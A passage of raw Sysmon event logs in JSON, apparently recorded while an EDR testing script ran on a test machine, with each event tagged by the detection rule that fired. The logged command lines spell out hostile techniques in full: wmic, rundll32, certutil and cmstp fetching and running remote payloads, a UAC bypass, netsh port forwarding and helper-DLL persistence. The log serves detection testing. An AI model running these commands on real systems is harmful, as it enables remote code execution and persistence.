Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 
21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 
21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows 
Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command 
Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 